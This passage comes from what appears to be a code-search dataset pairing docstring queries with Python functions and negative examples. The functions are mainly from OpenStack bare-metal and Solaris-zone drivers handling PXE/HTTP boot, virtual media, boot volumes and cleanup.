brackets for\n # IPv6 addresses.\n target_host = host[0].strip('[]')\n\n # Check if target_host is an IP or hostname matching the\n # connector host or IP, which would mean the provisioned\n # iSCSI LUN is on the same host as the instance.\n if target_host in [connector['ip'], connector['host']]:\n msg = _(\"iSCSI connection info from volume \"\n \"service indicates that the target is a \"\n \"local volume, which should not be used \"\n \"as a boot device for 'solaris' branded \"\n \"zones.\")\n raise exception.InvalidVolume(reason=msg)\n # Assuming that fibre_channel is non-local\n elif driver_type != 'fibre_channel':\n # Some other connection type that we don't understand\n # Let zone use some local fallback instead.\n msg = _(\"Unsupported volume driver type '%s' can not be used \"\n \"as a boot device for zones.\" % driver_type)\n raise exception.InvalidVolume(reason=msg)\n\n # Volume looks OK to use. Notify Cinder of the attachment.\n self._volume_api.attach(context, volume_id, instance_uuid, mountpoint)\n return connection_info",
"def bootNodes(self):\n self.libvirt.bootSlaves()",
"def multinic_bootstrap_booting(self):\n self.env.revert_snapshot(\"ready\")\n\n slave = self.env.nodes().slaves[0]\n mac_addresses = [interface.mac_address for interface in\n slave.interfaces.filter(network__name='internal')]\n try:\n for mac in mac_addresses:\n Ebtables.block_mac(mac)\n for mac in mac_addresses:\n Ebtables.restore_mac(mac)\n slave.destroy(verbose=False)\n self.env.nodes().admins[0].revert(\"ready\")\n nailgun_slave = self.env.bootstrap_nodes([slave])[0]\n assert_equal(mac.upper(), nailgun_slave['mac'].upper())\n Ebtables.block_mac(mac)\n finally:\n for mac in mac_addresses:\n Ebtables.restore_mac(mac)",
"def clean_up_instance(self, task):\n manager_utils.node_power_action(task, states.POWER_OFF)\n disable_secure_boot_if_supported(task)\n\n node = task.node\n if (is_directed_lanboot_requested(node) or\n http_utils.is_http_boot_requested(node)):\n # In this cleaning step it sets the URLBOOTFILE & URLBOOTFILE2 &\n # HttpBootUri path as ''.\n sdflex_common.reset_bios_settings(node)\n http_boot_uri = node.driver_info.get('http_boot_uri')\n if http_boot_uri:\n sdflex_object = sdflex_common.get_sdflex_object(node)\n sdflex_object.set_http_boot_uri(None)\n\n if http_utils.is_http_boot_requested(node):\n try:\n images_info = http_utils.get_instance_image_info(task)\n except ironic_exception.MissingParameterValue as e:\n LOG.warning('Could not get instance image info '\n 'to clean up images for node %(node)s: %(err)s',\n {'node': node.uuid, 'err': e})\n else:\n http_utils.clean_up_http_env(task, images_info)\n else:\n super(SdflexPXEBoot, self).clean_up_instance(task)",
"def setup_boot(self):\n\n mission_state_names = list(Enums.mission_states.names())\n nominal_states = mission_state_names\n nominal_states.remove('manual')\n nominal_states.remove('startup')\n nominal_states.remove('safehold')\n nominal_states.remove('initialization_hold')\n\n if self.desired_boot_state in nominal_states:\n self.deployment_hold_length = 100 # Number of cycles for which the satellite will be in a deployment hold. This\n # is an item that is configured on Flight Software.\n self.elapsed_deployment = int(self.flight_controller.read_state(\"pan.deployment.elapsed\"))\n self.max_detumble_cycles = 100 # Number of cycles for which we expect the satellite to be in detumble\n\n # Let's be generous with what angular rate is allowable as \"detumbled.\"\n self.flight_controller.write_state(\"detumble_safety_factor\", 10)\n\n # Prevent ADCS faults from causing transition to initialization hold\n self.flight_controller.write_state(\"adcs_monitor.functional_fault.suppress\", \"true\")\n self.flight_controller.write_state(\"adcs_monitor.wheel1_fault.suppress\", \"true\")\n self.flight_controller.write_state(\"adcs_monitor.wheel2_fault.suppress\", \"true\")\n self.flight_controller.write_state(\"adcs_monitor.wheel3_fault.suppress\", \"true\")\n self.flight_controller.write_state(\"adcs_monitor.wheel_pot_fault.suppress\", \"true\")\n\n self.logger.put(f\"Waiting for the satellite to boot to {self.desired_boot_state}.\")",
"def bootMaster(self):\n self.libvirt.bootMaster()\n time.sleep(100)",
"def efibootmgr_setup(target):\n output = target.shell.run(\"efibootmgr\", output = True)\n bo_regex = re.compile(r\"^BootOrder: \"\n \"(?P<boot_order>([a-fA-F0-9]{4},)*[a-fA-F0-9]{4})$\",\n re.MULTILINE)\n # this one we added before calling this function with \"bootctl\n # install\"\n lbm_regex = re.compile(r\"^Boot(?P<entry>[a-fA-F0-9]{4})\\*? \"\n \"(?P<name>Linux Boot Manager$)\", re.MULTILINE)\n\n # this allows getting metadata from the target that tells us what\n # to look for in the UEFI thing\n uefi_bm_ipv4_entries = [\n \"U?EFI Network.*$\",\n \"UEFI PXEv4.*$\",\n \".*IPv?4.*$\",\n ]\n # FIXME: validate better\n if 'uefi_boot_manager_ipv4_regex' in target.kws:\n uefi_bm_ipv4_entries.append(target.kws[\"uefi_boot_manager_ipv4_regex\"])\n ipv4_regex = re.compile(r\"^Boot(?P<entry>[a-fA-F0-9]{4})\\*? \"\n # PXEv4 is QEMU's UEFI\n # .*IPv4 are some NUCs I've found\n \"(?P<name>(\" + \"|\".join(uefi_bm_ipv4_entries) + \"))\",\n re.MULTILINE)\n bom_m = bo_regex.search(output)\n if bom_m:\n boot_order = bom_m.groupdict()['boot_order'].split(\",\")\n else:\n boot_order = []\n target.report_info(\"current boot_order: %s\" % boot_order)\n lbm_m = lbm_regex.search(output)\n if not lbm_m:\n raise tc.blocked_e(\n \"Cannot find 'Linux Boot Manager' EFI boot entry\",\n dict(target = target, output = output))\n lbm = lbm_m.groupdict()['entry']\n lbm_name = lbm_m.groupdict()['name']\n\n ipv4_m = ipv4_regex.search(output)\n if not ipv4_m:\n raise tc.blocked_e(\n # FIXME: improve message to be more helpful and point to docz\n \"Cannot find IPv4 boot entry, enable manually\",\n dict(target = target, output = output))\n ipv4 = ipv4_m.groupdict()['entry']\n ipv4_name = ipv4_m.groupdict()['name']\n\n # the first to boot has to be ipv4, then linux boot manager\n\n if lbm in boot_order:\n boot_order.remove(lbm)\n if ipv4 in boot_order:\n boot_order.remove(ipv4)\n boot_order = [ ipv4, lbm ] + boot_order\n target.report_info(\"Changing boot order to %s followed by %s\"\n % (ipv4_name, lbm_name))\n target.shell.run(\"efibootmgr -o \" + \",\".join(boot_order))\n if False:\n # DISABLED: seems to get the system confused when it has to do\n # it, so let's use syslinux to always control it\n # Next time we reboot we want to go straight to our deployment\n target.report_info(\"Setting next boot to be Linux Boot Manager\")\n target.shell.run(\"efibootmgr -n \" + lbm)",
"def prepare_ramdisk(self, task, ramdisk_params):\n node = task.node\n\n # Label indicating a deploy or rescue operation being carried out on\n # the node, 'deploy' or 'rescue'. Unless the node is in a rescue like\n # state, the mode is set to 'deploy', indicating deploy operation is\n # being carried out.\n mode = deploy_utils.rescue_or_deploy_mode(node)\n\n if self.ipxe_enabled:\n # NOTE(mjturek): At this point, the ipxe boot script should\n # already exist as it is created at startup time. However, we\n # call the boot script create method here to assert its\n # existence and handle the unlikely case that it wasn't created\n # or was deleted.\n pxe_utils.create_ipxe_boot_script()\n\n # Generate options for both IPv4 and IPv6, and they can be\n # filtered down later based upon the port options.\n # TODO(TheJulia): This should be re-tooled during the Victoria\n # development cycle so that we call a single method and return\n # combined options. The method we currently call is relied upon\n # by two eternal projects, to changing the behavior is not ideal.\n dhcp_opts = pxe_utils.dhcp_options_for_instance(\n task, ipxe_enabled=self.ipxe_enabled, ip_version=4)\n dhcp_opts += pxe_utils.dhcp_options_for_instance(\n task, ipxe_enabled=self.ipxe_enabled, ip_version=6)\n provider = dhcp_factory.DHCPFactory()\n provider.update_dhcp(task, dhcp_opts)\n\n pxe_info = pxe_utils.get_image_info(node, mode=mode,\n ipxe_enabled=self.ipxe_enabled)\n\n # NODE: Try to validate and fetch instance images only\n # if we are in DEPLOYING state.\n if node.provision_state == states.DEPLOYING:\n pxe_info.update(\n pxe_utils.get_instance_image_info(\n task, ipxe_enabled=self.ipxe_enabled))\n\n boot_mode_utils.sync_boot_mode(task)\n\n pxe_options = pxe_utils.build_pxe_config_options(\n task, pxe_info, ipxe_enabled=self.ipxe_enabled,\n ramdisk_params=ramdisk_params)\n # TODO(dtantsur): backwards compability hack, remove in the V release\n if ramdisk_params.get(\"ipa-api-url\"):\n pxe_options[\"ipa-api-url\"] = ramdisk_params[\"ipa-api-url\"]\n\n if self.ipxe_enabled:\n pxe_config_template = deploy_utils.get_ipxe_config_template(node)\n else:\n pxe_config_template = deploy_utils.get_pxe_config_template(node)\n\n pxe_utils.create_pxe_config(task, pxe_options,\n pxe_config_template,\n ipxe_enabled=self.ipxe_enabled)\n manager_utils.node_set_boot_device(task, boot_devices.PXE,\n persistent=False)\n\n if self.ipxe_enabled and CONF.pxe.ipxe_use_swift:\n kernel_label = '%s_kernel' % mode\n ramdisk_label = '%s_ramdisk' % mode\n pxe_info.pop(kernel_label, None)\n pxe_info.pop(ramdisk_label, None)\n\n if pxe_info:\n pxe_utils.cache_ramdisk_kernel(task, pxe_info,\n ipxe_enabled=self.ipxe_enabled)\n\n LOG.debug('Ramdisk (i)PXE boot for node %(node)s has been prepared '\n 'with kernel params %(params)s',\n {'node': node.uuid, 'params': pxe_options})",
"def _create_boot_volume(self, context, instance):\n LOG.debug('Creating boot volume')\n boot_vol_az = CONF.solariszones.boot_volume_az\n boot_vol_type = CONF.solariszones.boot_volume_type\n try:\n vol = self._volume_api.create(\n context, instance['root_gb'],\n instance['hostname'] + \"-\" + self._rootzpool_suffix,\n \"Boot volume for instance '%s' (%s)\"\n % (instance['name'], instance['uuid']),\n volume_type=boot_vol_type, availability_zone=boot_vol_az)\n # TODO(npower): Polling is what nova/compute/manager also does when\n # creating a new volume, so we do likewise here.\n while True:\n volume = self._volume_api.get(context, vol['id'])\n if volume['status'] != 'creating':\n return volume\n greenthread.sleep(1)\n\n except Exception as reason:\n LOG.exception(_(\"Unable to create root zpool volume for instance \"\n \"'%s': %s\") % (instance['name'], reason))\n raise",
"def boot_installer(self):\n boot_timeout = int(config.get('iso_installer', 'BOOT_TIMEOUT'))\n self.child.expect('Escape character')\n LOG.info('connected to the VM (controller-0)')\n # send a escape character\n self.child.sendline('\\x1b')\n self.child.expect('boot:')\n cmd_boot_line = common.get_cmd_boot_line()\n self.child.sendline(cmd_boot_line)\n LOG.info('kernel command line sent: %s', cmd_boot_line)\n # send a enter character\n self.child.sendline('\\r')\n # setting a boot timeout\n self.child.timeout = boot_timeout\n self.child.expect('Loading vmlinuz')\n LOG.info('Loading vmlinuz')\n self.child.expect('Loading initrd.img')\n LOG.info('Loading initrd.img')\n self.child.expect('Starting installer, one moment...')\n LOG.info('Starting installer ...')\n self.child.expect('Performing post-installation setup tasks')\n LOG.info('Performing post-installation setup tasks')",
"def preprocess_hostOS_OS_boot(parser):\n if not FTOS.is_running(parser[\"PrimaryOS_name\"]):\n if FTOS.is_shutdown(parser[\"PrimaryOS_name\"]):\n status = FTOS.boot(parser[\"PrimaryOS_name\"])\n if status != \"success\":\n raise TA_error.Preprocess_Error(\"PrimaryOS OS boot command fail\")\n time.sleep(float(parser[\"pre_hostOS_boot_time\"]))\n if not FTOS.is_running(parser[\"PrimaryOS_name\"]):\n raise TA_error.Preprocess_Error(\"PrimaryOS OS can not boot\")",
"def default_pxeboot_config(self):\n\n # Use private subnet for pxe booting\n self.separate_pxeboot_network = False\n self.pxeboot_subnet = self.private_pxeboot_subnet\n self.controller_pxeboot_floating_address = \\\n IPAddress(self.pxeboot_subnet[2])\n self.controller_pxeboot_address_0 = \\\n IPAddress(self.pxeboot_subnet[3])\n self.controller_pxeboot_address_1 = \\\n IPAddress(self.pxeboot_subnet[4])\n\n self.pxeboot_start_address = self.pxeboot_subnet[2]\n self.pxeboot_end_address = self.pxeboot_subnet[-2]",
"async def pre_bootstrap(msg_cb):\n\n # Set provider type for post-bootstrap\n app.env['JUJU_PROVIDERTYPE'] = juju.get_cloud_types_by_name()[\n app.current_cloud]\n app.env['JUJU_CONTROLLER'] = app.current_controller\n app.env['JUJU_MODEL'] = app.current_model\n app.env['CONJURE_UP_SPELLSDIR'] = app.argv.spells_dir\n\n await utils.run_step('00_pre-bootstrap',\n 'pre-bootstrap',\n msg_cb)",
"def _power_on(self, instance, network_info):\n name = instance['name']\n zone = self._get_zone_by_name(name)\n if zone is None:\n raise exception.InstanceNotFound(instance_id=name)\n\n # Attempt to update the zones hostid in the instance data, to catch\n # those instances that might have been created without a hostid stored.\n self._set_instance_metahostid(instance)\n\n bootargs = []\n if CONF.solariszones.solariszones_boot_options:\n reset_bootargs = False\n persistent = 'False'\n\n # Get any bootargs already set in the zone\n cur_bootargs = utils.lookup_resource_property(zone, 'global', 'bootargs')\n\n # Get any bootargs set in the instance metadata by the user\n meta_bootargs = instance.metadata.get('bootargs')\n\n if meta_bootargs:\n bootargs = ['--', str(meta_bootargs)]\n persistent = str(\n instance.metadata.get('bootargs_persist', 'False'))\n if cur_bootargs is not None and meta_bootargs != cur_bootargs:\n with ZoneConfig(zone) as zc:\n reset_bootargs = True\n # Temporarily clear bootargs in zone config\n zc.clear_resource_props('global', ['bootargs'])\n\n try:\n zone.boot(bootargs)\n self._plug_vifs(instance, network_info)\n except Exception as ex:\n reason = utils.zonemgr_strerror(ex)\n LOG.exception(_(\"Unable to power on instance '%s' via \"\n \"zonemgr(3RAD): %s\") % (name, reason))\n raise exception.InstancePowerOnFailure(reason=reason)\n finally:\n if CONF.solariszones.solariszones_boot_options:\n if meta_bootargs and persistent.lower() == 'false':\n # We have consumed the metadata bootargs and\n # the user asked for them not to be persistent so\n # clear them out now.\n instance.metadata.pop('bootargs', None)\n instance.metadata.pop('bootargs_persist', None)\n\n if reset_bootargs:\n with ZoneConfig(zone) as zc:\n # restore original boot args in zone config\n zc.setprop('global', 'bootargs', cur_bootargs)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Cleans up the boot of the instance. This method cleans up the PXE / HTTP environment that was set up for booting the instance. It unlinks the instance kernel/ramdisk in the node's directory under tftproot / httproot and removes its PXE config / HTTP config. In the case of Directed LAN Boot / UEFI HTTP Boot, the BIOS settings are reset. In the case of UEFI iSCSI booting, it cleans up the iSCSI target information from the node. Secure boot is also disabled if it was enabled earlier during provisioning of the ironic node.
|
def clean_up_instance(self, task):
manager_utils.node_power_action(task, states.POWER_OFF)
disable_secure_boot_if_supported(task)
node = task.node
if (is_directed_lanboot_requested(node) or
http_utils.is_http_boot_requested(node)):
# In this cleaning step it sets the URLBOOTFILE & URLBOOTFILE2 &
# HttpBootUri path as ''.
sdflex_common.reset_bios_settings(node)
http_boot_uri = node.driver_info.get('http_boot_uri')
if http_boot_uri:
sdflex_object = sdflex_common.get_sdflex_object(node)
sdflex_object.set_http_boot_uri(None)
if http_utils.is_http_boot_requested(node):
try:
images_info = http_utils.get_instance_image_info(task)
except ironic_exception.MissingParameterValue as e:
LOG.warning('Could not get instance image info '
'to clean up images for node %(node)s: %(err)s',
{'node': node.uuid, 'err': e})
else:
http_utils.clean_up_http_env(task, images_info)
else:
super(SdflexPXEBoot, self).clean_up_instance(task)
|
[
"def clean_up_instance(self, task):\n manager_utils.node_power_action(task, states.POWER_OFF)\n disable_secure_boot_if_supported(task)\n\n node = task.node\n\n sdflex_common.reset_network_setting_dhcpless_boot(node)\n image_utils.cleanup_iso_image(task)",
"def wipe_puppet(self):\n # TODO IMPLEMENT THIS METHOD\n self.clean_setup()",
"def clean_up_ramdisk(self, task):\n LOG.debug(\"Cleaning up deploy boot for \"\n \"%(node)s\", {'node': task.node.uuid})\n\n sdflex_common.eject_vmedia(task,\n vmedia_device)\n self._cleanup_iso_image(task)",
"def cleanup(self):\n if not self.status:\n self.class_logger.info(\"Skip cleanup of switch id:%s due to Off status.\" % (self.id, ))\n return\n self.get()\n self.clearconfig()",
"def node_cleanup(self):\n LOG.debug(\"Running node cleanup.\")\n # nodetool -h <HOST> -p <PORT> -u <USER> -pw <PASSWORD> cleanup\n try:\n self._run_nodetool_command('cleanup')\n self.status.set_status(rd_instance.ServiceStatuses.RUNNING)\n except Exception:\n LOG.exception(\"The node failed to complete its cleanup.\")\n finally:\n self.status.end_restart()",
"def clean_up_ramdisk(self, task):\n node = task.node\n mode = deploy_utils.rescue_or_deploy_mode(node)\n try:\n images_info = pxe_utils.get_image_info(\n node, mode=mode, ipxe_enabled=self.ipxe_enabled)\n except exception.MissingParameterValue as e:\n LOG.warning('Could not get %(mode)s image info '\n 'to clean up images for node %(node)s: %(err)s',\n {'mode': mode, 'node': node.uuid, 'err': e})\n else:\n pxe_utils.clean_up_pxe_env(\n task, images_info, ipxe_enabled=self.ipxe_enabled)",
"def remove(self):\n\t\tc = Common()\n\t\tc.banner()\n\t\tc.client_hosts()\n\n\t\toperatingSystem = run(\"/bin/cat /etc/issue | /usr/bin/awk '{print $1}'\")\n\n\t\tif(operatingSystem=='Debian'):\n\t\t\trun('aptitude -y purge puppet')\n\t\t\trun('find /var/lib/puppet -type f -print0 | xargs -0r rm')\n\t\telse:\n\t\t\tprint '--->\\tOS not supported'\n\t\t\tsys.exit(0)\n\n\t\ttry:\n\t\t\tsubprocess.call(['/usr/sbin/puppetca', '--clean', '%s.%s' % (c.client_name(),self.domain)])\n\t\texcept Exception, e:\n\t\t\tprint 'error :', e\n\t\t\tpass\n\n\t\tsleep(3)\n\t\texit(0)",
"def cleanup_files(self):\n os.system(\"rm -r /tmp/kernelpop\")",
"def shutdown(self):\n self.commands[master_setup.subcommand].shutdown()",
"def _remove_pxe_config(self, host):\n if host.mgmt_mac:\n dashed_mac = host.mgmt_mac.replace(\":\", \"-\")\n\n # Remove the old file if it exists\n try:\n os.remove(\"/var/pxeboot/pxelinux.cfg/01-\" + dashed_mac)\n except OSError:\n pass\n\n try:\n os.remove(\"/var/pxeboot/pxelinux.cfg/efi-01-\" + dashed_mac + \".cfg\")\n os.remove(\"/var/pxeboot/pxelinux.cfg/efi-01-\" + dashed_mac)\n except OSError:\n pass",
"def prepare_instance(self, task):\n # Need to enable secure boot, if being requested.\n # update_secure_boot_mode checks and enables secure boot only if the\n # deploy has requested secure boot\n boot_option = deploy_utils.get_boot_option(task.node)\n if boot_option != \"kickstart\":\n sdflex_common.update_secure_boot_mode(task, True)\n if not http_utils.is_http_boot_requested(task.node):\n if boot_option == \"kickstart\":\n prepare_node_for_deploy(task)\n super(SdflexPXEBoot, self).prepare_instance(task)\n else:\n boot_mode_utils.sync_boot_mode(task)\n node = task.node\n boot_option = deploy_utils.get_boot_option(node)\n boot_device = None\n instance_image_info = {}\n if boot_option == \"ramdisk\":\n instance_image_info = http_utils.get_instance_image_info(task)\n http_utils.cache_ramdisk_kernel(task, instance_image_info)\n if deploy_utils.is_iscsi_boot(task) or boot_option == \"ramdisk\":\n http_utils.prepare_instance_http_config(\n task, instance_image_info,\n iscsi_boot=deploy_utils.is_iscsi_boot(task),\n ramdisk_boot=(boot_option == \"ramdisk\"))\n if http_utils.is_http_boot_requested(task.node):\n boot_device = boot_devices.UEFIHTTP\n else:\n boot_device = boot_devices.PXE\n elif boot_option != \"local\":\n if task.driver.storage.should_write_image(task):\n # Make sure that the instance kernel/ramdisk is cached.\n # This is for the takeover scenario for active nodes.\n instance_image_info = (\n http_utils.get_instance_image_info(task))\n http_utils.cache_ramdisk_kernel(task, instance_image_info)\n iwdi = (\n task.node.driver_internal_info.get('is_whole_disk_image'))\n try:\n root_uuid_or_disk_id = task.node.driver_internal_info[\n 'root_uuid_or_disk_id'\n ]\n except KeyError:\n if not task.driver.storage.should_write_image(task):\n pass\n elif not iwdi:\n LOG.warning(\"The UUID for the root partition can't be\"\n \" found, unable to switch the pxe config \"\n \"from deployment mode to service (boot) \"\n \"mode for node %(node)s\",\n {\"node\": task.node.uuid})\n else:\n LOG.warning(\"The disk id for the whole disk image \"\n \"can't be found, unable to switch the \"\n \"pxe config from deployment mode to \"\n \"service (boot) mode for node %(node)s. \"\n \"Booting the instance from disk.\",\n {\"node\": task.node.uuid})\n http_utils.clean_up_http_config(task)\n boot_device = boot_devices.DISK\n else:\n http_utils.build_service_http_config(task,\n instance_image_info,\n root_uuid_or_disk_id)\n if http_utils.is_http_boot_requested(task.node):\n boot_device = boot_devices.UEFIHTTP\n else:\n boot_device = boot_devices.PXE\n else:\n # If it's going to boot from the local disk, we don't need\n # PXE config files. They still need to be generated as part\n # of the prepare() because the deployment does PXE boot the\n # deploy ramdisk\n http_utils.clean_up_http_config(task)\n boot_device = boot_devices.DISK\n\n # NOTE(pas-ha) do not re-set boot device on ACTIVE nodes\n # during takeover\n if boot_device and task.node.provision_state != states.ACTIVE:\n persistent = True\n if node.driver_info.get('force_persistent_boot_device',\n 'Default') == 'Never':\n persistent = False\n manager_utils.node_set_boot_device(task, boot_device,\n persistent=persistent)",
"def cleanDynagen(self):\n\n self.dynagen.dynamips.clear()\n self.dynagen.handled = False\n self.dynagen.devices.clear()\n self.dynagen.globalconfig.clear()\n self.dynagen.configurations.clear()\n self.dynagen.ghosteddevices.clear()\n self.dynagen.ghostsizes.clear()\n self.dynagen.bridges.clear()\n self.dynagen.autostart.clear()\n\n for dynamips in globals.GApp.dynagen.dynamips.values():\n try:\n dynamips.reset()\n except:\n continue\n\n if globals.GApp.HypervisorManager:\n globals.GApp.HypervisorManager.stopProcHypervisors()\n if globals.GApp.QemuManager:\n globals.GApp.QemuManager.stopQemu()",
"def cleanup(self):\n\n self.snmp_requester.cleanup()",
"def cleanupServer(self):\n if self._serverProc is not None:\n self._client(\"killServer\")\n if isinstance(self._serverProc, subprocess.Popen):\n self._serverProc.communicate()\n self._devnull.close()\n self.callCmd(\n [\"rsh\", \"-l\", \"root\", self._remoteHost,\n \"rm -rf /var/tmp/bcpython /var/lib/python2.7\"])\n self._serverProc = None",
"def cleanup(self):\n self.log.debug('template_igt - in template_igt cleanup()')\n # Add resource setup code here",
"def multinic_bootstrap_booting(self):\n self.env.revert_snapshot(\"ready\")\n\n slave = self.env.nodes().slaves[0]\n mac_addresses = [interface.mac_address for interface in\n slave.interfaces.filter(network__name='internal')]\n try:\n for mac in mac_addresses:\n Ebtables.block_mac(mac)\n for mac in mac_addresses:\n Ebtables.restore_mac(mac)\n slave.destroy(verbose=False)\n self.env.nodes().admins[0].revert(\"ready\")\n nailgun_slave = self.env.bootstrap_nodes([slave])[0]\n assert_equal(mac.upper(), nailgun_slave['mac'].upper())\n Ebtables.block_mac(mac)\n finally:\n for mac in mac_addresses:\n Ebtables.restore_mac(mac)",
"def shutdown(self):\n if self.ipkernel is not None:\n self.cleanup_consoles()\n self.ipkernel.shell.exit_now = True\n self.ipkernel.cleanup_connection_file()\n self.ipkernel.iopub_thread.stop()\n self.ipkernel = None",
"def shutdown(self):\n self._exec_cmd(_vix.VixVM_PowerOff,\n self._vm_handle,\n VIX_VMPOWEROP_FROM_GUEST,\n None,\n None\n )",
"def cleanup(self):\n os.system(\"rm -rf /dev/shm/images/kinect_rgb\")\n os.system(\"rm -rf /dev/shm/images/kinect_depth\")"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Initialize the SdflexRedfish Virtual Media Boot interface.
|
def __init__(self):
super(SdflexRedfishVirtualMediaBoot, self).__init__()
if not sushy:
raise ironic_exception.DriverLoadError(
            driver='sdflex-redfish',
reason=_('Unable to import the sushy library'))
|
[
"def init(verbose):\n\n\tif verbose:\n\t\tlog.basicConfig(format=\"%(levelname)s: %(message)s\", level=log.DEBUG)\n\telse:\n\t\tlog.basicConfig(format=\"%(levelname)s: %(message)s\")\n\n\tlog.info(\"Initializing SmartSpa subsystems.\")\n\n\tglobal real_time_config\n\treal_time_config = Config(\"real_time\")\n\n\tinit_sensing()\n\tinit_hardware()\n\tinit_control()\n\tinit_system()\n\tinit_ui()\n\tinit_db()",
"def InitDevice(self):\n # No need to init the device.\n pass",
"def init_vm(self):\n self.r2api.init_vm()\n self.did_init_vm = True",
"def init_sdr():\n\n LOGGER.info(\"Performing SDR initialisation on application startup\")\n sdr.start(samples_callback=spectrum_density_estimator(broadcast))",
"def __init__(self, vm_spec):\n super(WindowsGceVirtualMachine, self).__init__(vm_spec)\n self.boot_metadata['windows-startup-script-ps1'] = (\n windows_virtual_machine.STARTUP_SCRIPT\n )",
"def __init__(self, *args, **kwargs):\n q.logger.log(\"Mounting file system\")\n super(MemFS, self).__init__(*args, **kwargs)",
"def __init__(self, visible=0, size=(1920, 1080)):\n self.display = Display(visible=visible, size=size)\n log.info(\"Virtual display set up, visible: {}, size: {}\".\n format(False if not visible else True, size))\n self.display.start()\n time.sleep(1)",
"def VISA_init():\n return hv_base.VISA_init()",
"def setupBootRegion(self):\n self.virtualMemoryRequest(\n \"PhysicalRegion\",\n {\n \"RegionType\": \"BootRegion\",\n \"Size\": PcConfig.get_boot_region_size(),\n \"Type\": \"I\",\n \"Bank\": 0,\n },\n )",
"def __init__(self, svariant=''):\r\n # Call the Super Class Constructor\r\n GnuArmDevice.__init__(self, 'LPC11U68')\r\n\r\n # Load the Specifics\r\n self.svariant = svariant\r\n self.defines = ['TARGET_LPC11U68', 'TOOLCHAIN_GCC_ARM', '__CORTEX_M0_PLUS']\r\n self.libs = ['gcc', 'c', 'nosys']\r\n self.ldfile = 'LPC11U24.ld'\r\n self.ldpath = 'LPC11U24'\r\n self.package = 'armld/LPC11U24.7z'\r\n self.flash = 256\r\n self.ram = 32\r\n self.eeprom = 4\r\n self.arch = CPU_CORTEXM0PLUS",
"def __init__(self,\n mount_type='PERSISTENT',\n mode='READ_WRITE',\n disk=None,\n device_name=None,\n boot=False,\n source=None,\n init_disk_name=None,\n init_disk_size=None,\n init_disk_image=None,\n init_disk_project=None,\n auto_delete=True):\n self.mount_type = mount_type\n self.mode = mode\n if type(disk) is Disk:\n self.disk = disk\n else:\n self.disk = None\n self.device_name = device_name\n self.boot = boot\n self.source = source\n self.init_disk_name = init_disk_name\n self.init_disk_size = init_disk_size\n self.init_disk_image = init_disk_image\n self.init_disk_project = init_disk_project\n self.auto_delete = auto_delete",
"def __init__(self, svariant=''):\r\n # Call the Super Class Constructor\r\n GnuArmDevice.__init__(self, 'LPC11U24')\r\n\r\n # Load the Specifics\r\n self.svariant = svariant\r\n self.defines = ['TARGET_LPC11U24', 'TOOLCHAIN_GCC_ARM', '__CORTEX_M0']\r\n self.libs = ['gcc', 'c', 'nosys']\r\n self.ldfile = 'LPC11U24.ld'\r\n self.ldpath = 'LPC11U24'\r\n self.package = 'armld/LPC11U24.7z'\r\n self.flash = 32\r\n self.ram = 8\r\n self.eeprom = 4\r\n self.arch = CPU_CORTEXM0",
"def bootMaster(self):\n self.libvirt.bootMaster()\n time.sleep(100)",
"def __init__(self):\n self._red_led = pyb.LED(1) # Turns led on (red color)\n self._red_led.on()\n # Setup sensor settings\n # https://docs.openmv.io/library/omv.sensor.html#constants\n sensor.reset()\n sensor.set_vflip(True) # Reverse image on vertical axis\n sensor.set_hmirror(True) # Reverse image on horizontal axis\n sensor.set_pixformat(sensor.RGB565)\n sensor.set_framesize(sensor.QVGA)\n sensor.set_auto_gain(False) # Must be turned off for color tracking\n # Must be turned off for color tracking\n sensor.set_auto_whitebal(False)",
"def __init__(self, description : dict):\n super().__init__(description)\n if 'parameters' in description:\n populate_params(self, description['parameters'])\n else:\n warnings.warn(\"Please use an hwh file with the SD-FEC driver\"\n \" - the default configuration is being used\")\n self._config = _lib.XSdFecLookupConfig(0)\n # TODO consider how we should set default LDPC and Turbo code params\n self._instance = _ffi.new(\"XSdFec*\")\n self._config.BaseAddress = self.mmio.array.ctypes.data\n _lib.XSdFecCfgInitialize(self._instance, self._config)",
"def initialize(self):\n self.initialized = False\n self.initialize_cameras()\n self.initialize_electronics()\n self.initialized = True",
"def __init__(self, event_loop=None):\n super().__init__('/dev/dri/card0', event_loop)",
"def initializeWaveplate(self):\n\n self.statusReport('Initialize Waveplate')\n if self.waveIni == 1:\n return\n self.waveIni = 1\n self.Waveplate = StageCommunication('GROUP3', 'POSITIONER')\n self.Waveplate.connectStage()\n self.Waveplate.searchForHome()\n self.Waveplate.getCurrPos()",
"def initialize_framing(self):\n if self.connection_mode == \"ETHERNET\":\n self.sut_adapter = EthernetAdapter.EthernetAdapter()\n\n if self.sut_mac != \"\":\n self.sut_adapter.dut_mac = self.sut_mac\n else:\n self.sut_adapter.sut_ip = self.sut_ip\n\n self.sut_adapter.sut_interface = self.sut_interface\n\n self.sut_adapter.start()\n\n self.seq_nr = 1\n \n self.initialized = True"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Returns the boot iso image name for a given node.
|
def _get_iso_image_name(node):
return "boot-%s.iso" % node.uuid
|
[
"def get_name() -> str:\n return platform.node()",
"def get_img_name(self):\n\n name = self.img\n idx = name.rindex(\".\")\n return name[:idx]",
"def get_img_name(shortcut):\n name = \"Chess_{}{}t45.svg\".format(shortcut.lower(),\n \"l\" if shortcut.isupper() else \"d\")\n return name",
"def default_root_device_name(self, instance, image_meta, root_bdm):\n LOG.debug(\"default_root_device_name\")\n raise NotImplementedError()",
"def _get_image_file_name(img_path):\n\treturn img_path.rpartition('/')[-1]",
